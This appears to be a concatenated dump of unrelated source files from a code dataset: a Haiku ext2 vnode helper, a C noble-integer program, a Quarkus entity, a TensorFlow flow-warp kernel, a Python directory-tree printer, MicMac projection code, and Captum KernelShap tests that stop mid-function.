	{
		return fStatus;
	}

	void Unset()
	{
		if (fInode != NULL) {
			put_vnode(fInode->GetVolume()->FSVolume(), fInode->ID());
			fInode = NULL;
			fStatus = B_NO_INIT;
		}
	}

	status_t SetTo(Volume* volume, ino_t id)
	{
		// Drops any previous reference before acquiring the new one.
		Unset();
		return fStatus = get_vnode(volume->FSVolume(), id, (void**)&fInode);
	}

	status_t Get(Inode** _inode)
	{
		*_inode = fInode;
		return fStatus;
	}

	void Keep()
	{
		// Transfers ownership to the caller: the destructor will no longer
		// put_vnode() the reference.
		TRACEI("Vnode::Keep()\n");
		fInode = NULL;
	}

	// Publishes a freshly created inode to the VFS within a transaction and
	// registers a listener so an aborted transaction can be detected.
	status_t Publish(Transaction& transaction, Inode* inode,
		fs_vnode_ops* vnodeOps, uint32 publishFlags)
	{
		TRACEI("Vnode::Publish()\n");
		Volume* volume = transaction.GetVolume();

		status_t status = B_OK;

		if (!inode->IsSymLink() && volume->ID() >= 0) {
			TRACEI("Vnode::Publish(): Publishing volume: %p, %" B_PRIdINO
				", %p, %p, %" B_PRIu16 ", %" B_PRIx32 "\n", volume->FSVolume(),
				inode->ID(), inode, vnodeOps != NULL ? vnodeOps : &gExt2VnodeOps,
				inode->Mode(), publishFlags);
			status = publish_vnode(volume->FSVolume(), inode->ID(), inode,
				vnodeOps != NULL ? vnodeOps : &gExt2VnodeOps, inode->Mode(),
				publishFlags);
			TRACEI("Vnode::Publish(): Result: %s\n", strerror(status));
		}

		if (status == B_OK) {
			TRACEI("Vnode::Publish(): Preparing internal data\n");
			fInode = inode;
			fStatus = B_OK;

			cache_add_transaction_listener(volume->BlockCache(),
				transaction.ID(), TRANSACTION_ABORTED, &_TransactionListener,
				inode);
		}

		return status;
	}

private:
	status_t	fStatus;
	Inode*		fInode;

	// TODO: How to apply coding style here?
	static void _TransactionListener(int32 id, int32 event, void* _inode)
	{
		Inode* inode = (Inode*)_inode;

		if (event == TRANSACTION_ABORTED) {
			// TODO: Unpublish?
			panic("Transaction %d aborted, inode %p still exists!\n", (int)id,
				inode);
		}
	}
};
#endif // INODE_H
| 3,112 |
897 | <filename>C/math/Noble_Integer.c
/*An integer x is said to be Noble given an array
if the number of integers greater than x are equal to x.
If noble integer is not found output is -1.
*/
#include <stdio.h>
int nobleint(int *, int);
int main()
{
    int num, i, arr[1000];

    printf("Enter the number of elements:");
    /* Validate the element count: scanf can fail, and num must fit in the
       fixed 1000-element buffer (the original accepted any value, which
       could overflow arr). */
    if (scanf("%d", &num) != 1 || num < 1 || num > 1000)
    {
        printf("Invalid number of elements\n");
        return 1;
    }
    printf("Enter the elements:");
    for (i = 0; i < num; i++)
    {
        if (scanf("%d", &arr[i]) != 1)
        {
            printf("Invalid element\n");
            return 1;
        }
    }
    /* Print the noble integer, or -1 if none exists. */
    printf("%d", nobleint(arr, num));
    return 0;
}
/* Returns the noble integer of the array, i.e. a value x such that exactly
   x elements of the array are strictly greater than x.  Returns -1 when no
   such value exists.  O(n^2) time, O(1) space.

   Fixes over the original: the dead `x` flag is removed, and the function
   now has a guaranteed return on every path (the original could fall off
   the end of a non-void function, which is undefined behavior). */
int nobleint(int *arr, int num)
{
    int count, i, j;

    for (i = 0; i < num; i++)
    {
        /* Count elements strictly greater than arr[i]. */
        count = 0;
        for (j = 0; j < num; j++)
        {
            if (arr[i] < arr[j])
                count = count + 1;
        }
        if (count == arr[i])
            return count;
    }
    return -1;
}
/*
Sample Output
Enter the number of elements:4
Enter the elements:7 3 9 81
3
Enter the number of elements:3
Enter the elements:2 2 2
-1
Complexities
Time Complexity:O(n^2)
Space Complexity:O(1)
*/
| 438 |
10,225 | package io.quarkus.it.mongodb.panache.transaction;
import org.bson.codecs.pojo.annotations.BsonId;
import io.quarkus.mongodb.panache.MongoEntity;
import io.quarkus.mongodb.panache.PanacheMongoEntityBase;
// Panache entity stored in the dedicated "transaction-person" database,
// used to exercise MongoDB transaction support.
@MongoEntity(database = "transaction-person")
public class TransactionPerson extends PanacheMongoEntityBase {
    // Explicit numeric identifier (no auto-generated ObjectId).
    @BsonId
    public Long id;
    public String firstname;
    public String lastname;
}
| 148 |
438 | <gh_stars>100-1000
#define EIGEN_USE_THREADS
#include "flow_warp.h"
#include "tensorflow/core/framework/op_kernel.h"
#include "tensorflow/core/framework/register_types.h"
#include "tensorflow/core/framework/types.h"
#include "tensorflow/core/platform/types.h"
namespace tensorflow {

typedef Eigen::GpuDevice GPUDevice;

// Op kernel that warps an input image with a dense optical-flow field.
// Expects rank-4 float tensors whose N x H x W dimensions agree; the actual
// warping is delegated to FlowWarp() (declared in flow_warp.h) on the GPU.
template<typename Device>
class FlowWarpKernel : public OpKernel {
  public:
    explicit FlowWarpKernel(OpKernelConstruction *ctx) : OpKernel(ctx) {}

    void Compute(OpKernelContext *ctx) override {
      // Get the input image and flow and verify dimensions
      const Tensor& input_t = ctx->input(0);
      const Tensor& flow_t  = ctx->input(1);

      OP_REQUIRES(ctx, input_t.dims() == 4,
                  errors::InvalidArgument("Input image must have rank 4"));
      OP_REQUIRES(ctx, flow_t.dims() == 4,
                  errors::InvalidArgument("Input flow must have rank 4"));
      OP_REQUIRES(ctx,
                  input_t.dim_size(0) == flow_t.dim_size(0) && input_t.dim_size(
                    1) == flow_t.dim_size(1) && input_t.dim_size(2) == flow_t.dim_size(2),
                  errors::InvalidArgument(
                    "Input image and flow must have same N x H x W dimensions"));

      // Allocate the memory for the output (same shape as the input image).
      Tensor *output_t;
      OP_REQUIRES_OK(ctx, ctx->allocate_output(0, input_t.shape(), &output_t));

      // Perform the flow warp on the GPU.
      auto input  = input_t.tensor<float, 4>();
      auto flow   = flow_t.tensor<float, 4>();
      auto output = output_t->tensor<float, 4>();

      FlowWarp(ctx->eigen_gpu_device(), input, flow, output);
    }
};

// This op is GPU-only: no CPU kernel is registered.
REGISTER_KERNEL_BUILDER(Name("FlowWarp")
                          .Device(DEVICE_GPU),
                        FlowWarpKernel<GPUDevice>)

} // end namespace tensorflow
| 808 |
930 | # Directory Tree Generator
import os
import argparse
def realname(path, root=None):
    """Return the display name for *path*.

    If *root* is given, *path* is interpreted relative to it.  Symbolic
    links are shown as ``'name -> target'``; everything else as the plain
    base name.
    """
    full_path = path if root is None else os.path.join(root, path)
    display = os.path.basename(full_path)
    if os.path.islink(full_path):
        target = os.readlink(full_path)
        display = '%s -> %s' % (os.path.basename(full_path), target)
    return display
def ptree(startpath, depth=-1):
    """Print an ASCII tree of the directory rooted at *startpath*.

    depth: maximum directory depth to print; -1 (default) means unlimited.
    Symlinked directories are listed but not descended into (os.walk does
    not follow them by default).
    """
    prefix = 0
    assert os.path.isdir(startpath), "Directory not valid"
    if startpath != '/':
        if startpath.endswith('/'):
            startpath = startpath[:-1]
        # Length of the root path; slicing it off lets us count separators
        # to get each entry's depth relative to startpath.
        prefix = len(startpath)
    for root, dirs, files in os.walk(startpath):
        level = root[prefix:].count(os.sep)
        # Deeper than requested: skip printing, but keep walking siblings.
        if depth > -1 and level > depth:
            continue
        indent = subindent = ''
        if level > 0:
            indent = '| ' * (level-1) + '|-- '
            subindent = '| ' * (level) + '|-- '
        print('{}{}/'.format(indent, realname(root)))
        # Directories are printed by the walk itself; only symlinked ones
        # need to be listed explicitly here (walk won't recurse into them).
        for d in dirs:
            if os.path.islink(os.path.join(root, d)):
                print('{}{}'.format(subindent, realname(d, root=root)))
        for f in files:
            print('{}{}'.format(subindent, realname(f, root=root)))
if __name__ == '__main__':
    # Command-line entry point: print the tree for the given start directory.
    print("\nDirectory tree \n")
    parser = argparse.ArgumentParser(description='prints directory tree.')
    parser.add_argument('startpath', type=str,
                        help='path to stating directory')
    args = parser.parse_args()
    # Expand the parsed namespace into keyword arguments for ptree().
    argsd = vars(args)
    ptree(**argsd)
    input("\n\nPress enter to exit")
| 696 |
451 | /*Header-MicMac-eLiSe-25/06/2007
MicMac : Multi Image Correspondances par Methodes Automatiques de Correlation
eLiSe : ELements of an Image Software Environnement
www.micmac.ign.fr
Copyright : Institut Geographique National
Author : <NAME>
Contributors : <NAME>, <NAME>.
[1] <NAME>, <NAME>.
"A multiresolution and optimization-based image matching approach:
An application to surface reconstruction from SPOT5-HRS stereo imagery."
In IAPRS vol XXXVI-1/W41 in ISPRS Workshop On Topographic Mapping From Space
(With Special Emphasis on Small Satellites), Ankara, Turquie, 02-2006.
[2] <NAME>, "MicMac, un lociel de mise en correspondance
d'images, adapte au contexte geograhique" to appears in
Bulletin d'information de l'Institut Geographique National, 2007.
Francais :
MicMac est un logiciel de mise en correspondance d'image adapte
au contexte de recherche en information geographique. Il s'appuie sur
la bibliotheque de manipulation d'image eLiSe. Il est distibue sous la
licences Cecill-B. Voir en bas de fichier et http://www.cecill.info.
English :
MicMac is an open source software specialized in image matching
for research in geographic information. MicMac is built on the
eLiSe image library. MicMac is governed by the "Cecill-B licence".
See below and http://www.cecill.info.
Header-MicMac-eLiSe-25/06/2007*/
#include "StdAfx.h"
/*****************************************/
/* */
/* cSurfAnalIdent */
/* */
/*****************************************/
// Analytic surface defined by a cartesian frame change: the (U,V,L)
// coordinates are simply the euclidean coordinates expressed in the local
// frame given by aCart.
class cSurfAnalReperCart : public cInterfSurfaceAnalytique
{
     public :
         cSurfAnalReperCart (const cChCoCart & aCart) :
             cInterfSurfaceAnalytique (true) ,
             // mCCCE2L maps absolute ("euclidean") coords to the local frame,
             // mCCCL2E is its inverse.
             mCCCE2L (aCart.Inv()),
             mCCCL2E (mCCCE2L.Inv())
         {
         }
         Pt3dr E2UVL(const Pt3dr & aP) const {return mCCCE2L.FromLoc(aP);}
         Pt3dr UVL2E(const Pt3dr & aP) const {return mCCCL2E.FromLoc(aP);}
         void AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const {}

         // Not serializable: this surface type has no XML description.
         cXmlDescriptionAnalytique Xml() const
         {
             ELISE_ASSERT(false,"cSurfAnalIdent::Xml");
             cXmlDescriptionAnalytique aNS;
             return aNS;
         }
         bool HasOrthoLoc() const {return false;}

         // Intersects a 3D segment with the local plane z = aZ1 and tags the
         // intersection as entering (Rent) or leaving (Sort) the surface.
         std::vector<cInterSurfSegDroite> InterDroite(const ElSeg3D & aSegOri,double aZ1) const
         {
                ElSeg3D aSeg(E2UVL(aSegOri.PtOfAbsc(0)),E2UVL(aSegOri.PtOfAbsc(1)));
                std::vector<cInterSurfSegDroite> aRes;
                double aZ0 = aSeg.P0().z ;
                double aDZ = aSeg.TgNormee().z;
                // Segment parallel to the plane: no intersection.
                if (aDZ==0) return aRes;

                aRes.push_back
                (
                     cInterSurfSegDroite
                     (
                           (aZ1-aZ0)/aDZ,
                           ( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
                     )
                );
                return aRes;
         }


     private :
         cChCoCart mCCCE2L;
         cChCoCart mCCCL2E;
};
cInterfSurfaceAnalytique * cInterfSurfaceAnalytique::FromCCC(const cChCoCart & aCCC)
{
    // Factory: wrap the cartesian frame change in an analytic surface.
    // Ownership of the returned object is passed to the caller.
    return new cSurfAnalReperCart(aCCC);
}
/*****************************************/
/* */
/* cSurfAnalIdent */
/* */
/*****************************************/
// Analytic surface that is (almost) the identity: (U,V,L) coordinates equal
// the euclidean ones shifted by a constant reference altitude aZRef.
class cSurfAnalIdent : public cInterfSurfaceAnalytique
{
     public :
         cSurfAnalIdent(double aZRef) :
             cInterfSurfaceAnalytique (true) ,
             mZRef (aZRef),
             // Constant translation applied along z.
             mVec  (0,0,mZRef)
         {
         }
         Pt3dr E2UVL(const Pt3dr & aP) const {return aP - mVec;}
         Pt3dr UVL2E(const Pt3dr & aP) const {return aP + mVec;}
         void AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const {}

         // Not serializable: this surface type has no XML description.
         cXmlDescriptionAnalytique Xml() const
         {
             ELISE_ASSERT(false,"cSurfAnalIdent::Xml");
             cXmlDescriptionAnalytique aNS;
             return aNS;
         }
         bool HasOrthoLoc() const {return false;}

         // Intersects a 3D segment with the horizontal plane z = aZ1
         // (relative to mZRef) and tags it as entering or leaving.
         std::vector<cInterSurfSegDroite> InterDroite(const ElSeg3D & aSeg,double aZ1) const
         {
                std::vector<cInterSurfSegDroite> aRes;
                double aZ0 = aSeg.P0().z -mZRef;
                double aDZ = aSeg.TgNormee().z;
                // Segment parallel to the plane: no intersection.
                if (aDZ==0) return aRes;

                aRes.push_back
                (
                     cInterSurfSegDroite
                     (
                           (aZ1-aZ0)/aDZ,
                           ( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
                     )
                );
                return aRes;
         }

     private :
          double mZRef;
          Pt3dr  mVec;
};
cInterfSurfaceAnalytique * cInterfSurfaceAnalytique::Identite(double aZRef)
{
    // NOTE(review): the result is cached in a function-local static, so the
    // surface is built with the aZRef of the FIRST call only; subsequent
    // calls with a different aZRef silently return the old instance.
    // Verify callers always pass the same value (or remove the caching).
    static cInterfSurfaceAnalytique * aRes = new cSurfAnalIdent(aZRef);
    return aRes;
}
/*****************************************/
/* */
/* cProjOrthoCylindrique */
/* */
/*****************************************/
// Builds an ortho-cylindric projection.
//   aL2A      : frame change from the local frame to the absolute one.
//   aSegAbs   : axis of the cylinder, given in absolute coordinates.
//   aAngulCorr: if true, the transverse coordinate is an arc length
//               (atan2-based); otherwise a simple ratio is used.
cProjOrthoCylindrique::cProjOrthoCylindrique
(
      const cChCoCart & aL2A,
      const ElSeg3D & aSegAbs,
      bool  aAngulCorr
)  :
   cInterfSurfaceAnalytique (true),
   mL2A   (aL2A),
   mA2L   (mL2A.Inv()),
   mSegAbs  (aSegAbs),
   mAngulCorr (aAngulCorr)
{
    // Express the axis in the local frame to derive the projection constants.
    ElSeg3D aSegLoc
            (
                   Ab2Loc(aSegAbs.PtOfAbsc(0)),
                   Ab2Loc(aSegAbs.PtOfAbsc(1))
            );

    // mDist: distance (|z|) of the axis origin from the local plane.
    mDist = ElAbs(aSegLoc.P0().z);

    // Orient the axis tangent toward positive x, then store its slopes
    // per unit of x (mB in y, mC in z).
    Pt3dr aTg = aSegLoc.TgNormee();
    if (aTg.x <0)
       aTg = - aTg;

    mB = aTg.y / aTg.x;
    mC = aTg.z / aTg.x;
}
// Local frame -> absolute coordinates.
Pt3dr cProjOrthoCylindrique::Loc2Abs(const Pt3dr & aP) const
{
    return mL2A.FromLoc(aP);
}

// Absolute -> local frame coordinates.
Pt3dr cProjOrthoCylindrique::Ab2Loc(const Pt3dr  & aP) const
{
    return mA2L.FromLoc(aP);
}

// Local cartesian -> cylindric coordinates: replaces y by the (optionally
// angular) transverse coordinate measured around the axis, scaled by mDist.
// mUnUseAnamXCSte presumably disables the anamorphosis entirely (inherited
// flag — confirm in the base class).
Pt3dr cProjOrthoCylindrique::Loc2Cyl(const Pt3dr & aP) const
{
   if (mUnUseAnamXCSte) return aP;
// std::cout << "L2 C" << aP.y << " " << (aP.z-mD) << " " << (aP.y/(aP.z-mD)) << " " << atan2(aP.y,aP.z-mD) << "\n";
   // A: transverse offset from the axis; B: distance below the axis.
   double A = aP.y -mB * aP.x;
   double B = mDist + mC * aP.x - aP.z;

   double aV = (mAngulCorr ? atan2(A,B): (A/B)) ;
   return Pt3dr(aP.x,mDist * aV,aP.z);
}
// Inverse of Loc2Cyl: cylindric -> local cartesian coordinates.
Pt3dr cProjOrthoCylindrique::Cyl2Loc(const Pt3dr & aP) const
{
   if (mUnUseAnamXCSte) return aP;
   double aV = aP.y / mDist;
   // Undo the angular correction when it was applied in Loc2Cyl.
   if (mAngulCorr)
      aV = tan(aV);
   return Pt3dr
          (
              aP.x,
              mB * aP.x + aV*(mDist +mC * aP.x -aP.z),
              aP.z
          );
  // return Pt3dr(aP.x,aP.y*(aP.z-mD)/mD,aP.z);
}

// Absolute euclidean -> (U,V,L) surface coordinates.
Pt3dr cProjOrthoCylindrique::E2UVL(const Pt3dr & aP) const
{
    return Loc2Cyl(Ab2Loc(aP));
}

// (U,V,L) surface coordinates -> absolute euclidean.
Pt3dr cProjOrthoCylindrique::UVL2E(const Pt3dr & aP) const
{
    return Loc2Abs(Cyl2Loc(aP));
}
// This projection provides a local "ortho" frame.
bool cProjOrthoCylindrique::HasOrthoLoc() const
{
   return true;
}

// Surface coordinates -> local ortho frame.
Pt3dr cProjOrthoCylindrique::ToOrLoc(const Pt3dr & aP) const
{
    return Cyl2Loc(aP);
}

// Local ortho frame -> surface coordinates.
Pt3dr cProjOrthoCylindrique::FromOrLoc(const Pt3dr & aP) const
{
    return  Loc2Cyl(aP);
}

// The ortho-local mapping keeps x constant (the anamorphosis acts on y/z).
bool cProjOrthoCylindrique::OrthoLocIsXCste() const
{
   return true;
}

bool cProjOrthoCylindrique::IsAnamXCsteOfCart() const { return true; }

// Pt3dr FromOrLoc(const Pt3dr & aP) const ; // Def Err fatale
// Intersects a segment (given in absolute coords) with the local plane
// z = aZ1, tagging the intersection as entering (Rent) or leaving (Sort)
// depending on the segment's direction.
std::vector<cInterSurfSegDroite>  cProjOrthoCylindrique::InterDroite(const ElSeg3D & aSeg0,double aZ1) const
{
    // Work in the local frame, where the surface is the plane z = aZ1.
    ElSeg3D aSeg(Ab2Loc(aSeg0.PtOfAbsc(0)),Ab2Loc(aSeg0.PtOfAbsc(1)));
    std::vector<cInterSurfSegDroite> aRes;
    double aZ0 = aSeg.P0().z;
    double aDZ = aSeg.TgNormee().z;
    // Segment parallel to the plane: no intersection.
    if (aDZ==0) return aRes;

    aRes.push_back
    (
         cInterSurfSegDroite
         (
               (aZ1-aZ0)/aDZ,
               ( aZ0 > aZ1 ) ? eSurfVI_Rent : eSurfVI_Sort
         )
    );
    return aRes;
}
// No box adaptation is needed for this projection.
void cProjOrthoCylindrique::AdaptBox(Pt2dr & aP0,Pt2dr & aP1) const
{
}

// Serializes the projection parameters (frame, axis, angular flag) to XML.
cXmlOrthoCyl cProjOrthoCylindrique::XmlOCyl() const
{
   cXmlOrthoCyl aRes;
   aRes.Repere() = mL2A.El2Xml();
   aRes.P0() = mSegAbs.P0();
   aRes.P1() = mSegAbs.P1();
   aRes.AngulCorr() = mAngulCorr;

   return aRes;
}

// Wraps XmlOCyl() in the generic analytic-surface description.
cXmlDescriptionAnalytique cProjOrthoCylindrique::Xml() const
{
  cXmlDescriptionAnalytique aRes;
  aRes.OrthoCyl().SetVal(XmlOCyl());

  return aRes;
}
// Expands to nothing: makes "NS_SuperposeImage::cXmlOrthoCyl" resolve to the
// global-namespace type while keeping the signature self-documenting.
#define NS_SuperposeImage

// Deserializes a cProjOrthoCylindrique from its XML description
// (inverse of XmlOCyl()).
cProjOrthoCylindrique cProjOrthoCylindrique::FromXml
                      (
                           const cXmlOneSurfaceAnalytique&,
                           const NS_SuperposeImage::cXmlOrthoCyl& anOC
                      )
{
    cProjOrthoCylindrique aRes
                          (
                               cChCoCart::Xml2El(anOC.Repere()),
                               ElSeg3D(anOC.P0(),anOC.P1()),
                               anOC.AngulCorr()
                          );

/*
   cProjOrthoCylindrique aCAng
                         (
                               anOC.Repere().Ori(),
                               anOC.Repere().Ox(),
                               anOC.Repere().Oy(),
                               anOC.Repere().Oz(),
                               anOC.Dist(),
                               true
                         );
   cProjOrthoCylindrique aCOr
                         (
                               anOC.Repere().Ori(),
                               anOC.Repere().Ox(),
                               anOC.Repere().Oy(),
                               anOC.Repere().Oz(),
                               anOC.Dist(),
                               false
                         );

    while (1)
    {
         std::cout << "AAAAA \n";
         Pt3dr aP;
         std::cin >> aP.x  >> aP.y >> aP.z;
         Pt3dr aQA = aCAng.UVL2E(aP);
         Pt3dr aRA = aCAng.E2UVL(aQA);
         Pt3dr aQO = aCOr.UVL2E(aP);
         Pt3dr aRO = aCOr.E2UVL(aQO);
         std::cout << aP << aRA << " ;; " << aQA << "\n";
         std::cout << aP << aRO << " ;; " << aQO << "\n";
    }
*/

    return aRes;
}
/*
*/
/*Footer-MicMac-eLiSe-25/06/2007
Ce logiciel est un programme informatique servant à la mise en
correspondances d'images pour la reconstruction du relief.
Ce logiciel est régi par la licence CeCILL-B soumise au droit français et
respectant les principes de diffusion des logiciels libres. Vous pouvez
utiliser, modifier et/ou redistribuer ce programme sous les conditions
de la licence CeCILL-B telle que diffusée par le CEA, le CNRS et l'INRIA
sur le site "http://www.cecill.info".
En contrepartie de l'accessibilité au code source et des droits de copie,
de modification et de redistribution accordés par cette licence, il n'est
offert aux utilisateurs qu'une garantie limitée. Pour les mêmes raisons,
seule une responsabilité restreinte pèse sur l'auteur du programme, le
titulaire des droits patrimoniaux et les concédants successifs.
A cet égard l'attention de l'utilisateur est attirée sur les risques
associés au chargement, à l'utilisation, à la modification et/ou au
développement et à la reproduction du logiciel par l'utilisateur étant
donné sa spécificité de logiciel libre, qui peut le rendre complexe à
manipuler et qui le réserve donc à des développeurs et des professionnels
avertis possédant des connaissances informatiques approfondies. Les
utilisateurs sont donc invités à charger et tester l'adéquation du
logiciel à leurs besoins dans des conditions permettant d'assurer la
sécurité de leurs systèmes et ou de leurs données et, plus généralement,
à l'utiliser et l'exploiter dans les mêmes conditions de sécurité.
Le fait que vous puissiez accéder à cet en-tête signifie que vous avez
pris connaissance de la licence CeCILL-B, et que vous en avez accepté les
termes.
Footer-MicMac-eLiSe-25/06/2007*/
| 6,138 |
3,140 | <filename>tests/attr/test_kernel_shap.py
#!/usr/bin/env python3
import io
import unittest
import unittest.mock
from typing import Any, Callable, List, Tuple, Union
import torch
from captum._utils.typing import BaselineType, TensorOrTupleOfTensorsGeneric
from captum.attr._core.kernel_shap import KernelShap
from tests.helpers.basic import (
BaseTest,
assertTensorAlmostEqual,
assertTensorTuplesAlmostEqual,
)
from tests.helpers.basic_models import (
BasicModel_MultiLayer,
BasicModel_MultiLayer_MultiInput,
)
class Test(BaseTest):
def setUp(self) -> None:
super().setUp()
try:
import sklearn # noqa: F401
assert (
sklearn.__version__ >= "0.23.0"
), "Must have sklearn version 0.23.0 or higher"
except (ImportError, AssertionError):
raise unittest.SkipTest("Skipping KernelShap tests, sklearn not available.")
    # Single example, non-zero baseline; also checks the raw regression
    # coefficients against the attribution values.
    def test_linear_kernel_shap(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
        baseline = torch.tensor([[10.0, 20.0, 10.0]], requires_grad=True)
        self._kernel_shap_test_assert(
            net,
            inp,
            [40.0, 120.0, 80.0],
            n_samples=500,
            baselines=baseline,
            expected_coefs=[40.0, 120.0, 80.0],
        )

    # Single example, default (zero) baseline, several batch sizes.
    def test_simple_kernel_shap(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
        self._kernel_shap_test_assert(
            net,
            inp,
            [76.66666, 196.66666, 116.66666],
            perturbations_per_eval=(1, 2, 3),
            n_samples=500,
        )

    # Grouping features 0 and 1 via a feature mask; grouped features must
    # receive identical attribution.
    def test_simple_kernel_shap_with_mask(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)
        self._kernel_shap_test_assert(
            net,
            inp,
            [275.0, 275.0, 115.0],
            feature_mask=torch.tensor([[0, 0, 1]]),
            perturbations_per_eval=(1, 2, 3),
            expected_coefs=[275.0, 115.0],
        )

    # Verifies the progress bar written to stderr reaches 100% for each
    # perturbations_per_eval setting.
    @unittest.mock.patch("sys.stderr", new_callable=io.StringIO)
    def test_simple_kernel_shap_with_show_progress(self, mock_stderr) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[20.0, 50.0, 30.0]], requires_grad=True)

        # test progress output for each batch size
        for bsz in (1, 2, 3):
            self._kernel_shap_test_assert(
                net,
                inp,
                [76.66666, 196.66666, 116.66666],
                perturbations_per_eval=(bsz,),
                n_samples=500,
                show_progress=True,
            )
            output = mock_stderr.getvalue()

            # to test if progress calculation aligns with the actual iteration
            # all perturbations_per_eval should reach progress of 100%
            assert (
                "Kernel Shap attribution: 100%" in output
            ), f"Error progress output: {repr(output)}"

            # Reset the captured stderr between batch sizes.
            mock_stderr.seek(0)
            mock_stderr.truncate(0)

    # Scalar baseline broadcast over all features, combined with a mask.
    def test_simple_kernel_shap_with_baselines(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[20.0, 50.0, 30.0]])
        self._kernel_shap_test_assert(
            net,
            inp,
            [248.0, 248.0, 104.0],
            feature_mask=torch.tensor([[0, 0, 1]]),
            baselines=4,
            perturbations_per_eval=(1, 2, 3),
        )

    # Two examples attributed in one batch.
    def test_simple_batch_kernel_shap(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[2.0, 10.0, 3.0], [20.0, 50.0, 30.0]], requires_grad=True)
        self._kernel_shap_test_assert(
            net,
            inp,
            [[7.0, 32.5, 10.5], [76.66666, 196.66666, 116.66666]],
            perturbations_per_eval=(1, 2, 3),
            n_samples=20000,
        )
    # Batched examples with per-example feature masks.
    def test_simple_batch_kernel_shap_with_mask(self) -> None:
        net = BasicModel_MultiLayer()
        inp = torch.tensor([[2.0, 10.0, 3.0], [20.0, 50.0, 30.0]], requires_grad=True)
        self._kernel_shap_test_assert(
            net,
            inp,
            [[39.5, 39.5, 10.5], [275.0, 275.0, 115.0]],
            feature_mask=torch.tensor([[0, 0, 1], [1, 1, 0]]),
            perturbations_per_eval=(1, 2, 3),
            n_samples=100,
            expected_coefs=[[39.5, 10.5], [115.0, 275.0]],
        )

    # Three input tensors, no mask: every scalar is its own feature.
    def test_multi_input_kernel_shap_without_mask(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        inp1 = torch.tensor([[23.0, 0.0, 0.0]])
        inp2 = torch.tensor([[20.0, 0.0, 50.0]])
        inp3 = torch.tensor([[0.0, 100.0, 10.0]])
        expected = (
            [[90, 0, 0]],
            [[78, 0, 198]],
            [[0, 398, 38]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected,
            additional_input=(1,),
            n_samples=2000,
        )

    # Three input tensors with per-tensor masks; also checks non-trivial
    # baselines broadcast per input.
    def test_multi_input_kernel_shap_with_mask(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        inp1 = torch.tensor([[20.0, 50.0, 30.0]])
        inp2 = torch.tensor([[0.0, 100.0, 0.0]])
        inp3 = torch.tensor([[2.0, 10.0, 3.0]])
        mask1 = torch.tensor([[0, 1, 0]])
        mask2 = torch.tensor([[0, 1, 2]])
        mask3 = torch.tensor([[0, 0, 0]])
        expected = (
            [[255.0, 595.0, 255.0]],
            [[255.0, 595.0, 0.0]],
            [[255.0, 255.0, 255.0]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected,
            additional_input=(1,),
            feature_mask=(mask1, mask2, mask3),
        )
        expected_with_baseline = (
            [[184, 580.0, 184]],
            [[184, 580.0, -12.0]],
            [[184, 184, 184]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected_with_baseline,
            additional_input=(1,),
            feature_mask=(mask1, mask2, mask3),
            baselines=(2, 3.0, 4),
            perturbations_per_eval=(1, 2, 3),
        )

    # Batched multi-input attribution without a mask; expected_coefs covers
    # the flattened per-example coefficient vectors.
    def test_multi_input_batch_kernel_shap_without_mask(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        inp1 = torch.tensor([[23.0, 0.0, 0.0], [20.0, 50.0, 30.0]])
        inp2 = torch.tensor([[20.0, 0.0, 50.0], [0.0, 100.0, 0.0]])
        inp3 = torch.tensor([[0.0, 100.0, 10.0], [0.0, 10.0, 0.0]])
        expected = (
            [[90, 0, 0], [78.0, 198.0, 118.0]],
            [[78, 0, 198], [0.0, 398.0, 0.0]],
            [[0, 398, 38], [0.0, 38.0, 0.0]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected,
            additional_input=(1,),
            n_samples=2500,
            expected_coefs=[
                [90.0, 0, 0, 78, 0, 198, 0, 398, 38],
                [78.0, 198.0, 118.0, 0.0, 398.0, 0.0, 0.0, 38.0, 0.0],
            ],
        )

    # Batched multi-input attribution with masks (including a broadcast
    # single-row mask) and with baselines.
    def test_multi_input_batch_kernel_shap(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        inp1 = torch.tensor([[23.0, 100.0, 0.0], [20.0, 50.0, 30.0]])
        inp2 = torch.tensor([[20.0, 50.0, 30.0], [0.0, 100.0, 0.0]])
        inp3 = torch.tensor([[0.0, 100.0, 10.0], [2.0, 10.0, 3.0]])
        mask1 = torch.tensor([[1, 1, 1], [0, 1, 0]])
        mask2 = torch.tensor([[0, 1, 2]])
        mask3 = torch.tensor([[0, 1, 2], [0, 0, 0]])
        expected = (
            [[1088.6666, 1088.6666, 1088.6666], [255.0, 595.0, 255.0]],
            [[76.6666, 1088.6666, 156.6666], [255.0, 595.0, 0.0]],
            [[76.6666, 1088.6666, 156.6666], [255.0, 255.0, 255.0]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected,
            additional_input=(1,),
            feature_mask=(mask1, mask2, mask3),
            n_samples=300,
        )
        expected_with_baseline = (
            [[1040, 1040, 1040], [184, 580.0, 184]],
            [[52, 1040, 132], [184, 580.0, -12.0]],
            [[52, 1040, 132], [184, 184, 184]],
        )
        self._kernel_shap_test_assert(
            net,
            (inp1, inp2, inp3),
            expected_with_baseline,
            additional_input=(1,),
            feature_mask=(mask1, mask2, mask3),
            baselines=(2, 3.0, 4),
            perturbations_per_eval=(1, 2, 3),
        )
    # Remaining tests are for cases where forward function returns a scalar
    # as either a float, integer, 0d tensor or 1d tensor.
    def test_single_kernel_shap_scalar_float(self) -> None:
        net = BasicModel_MultiLayer()
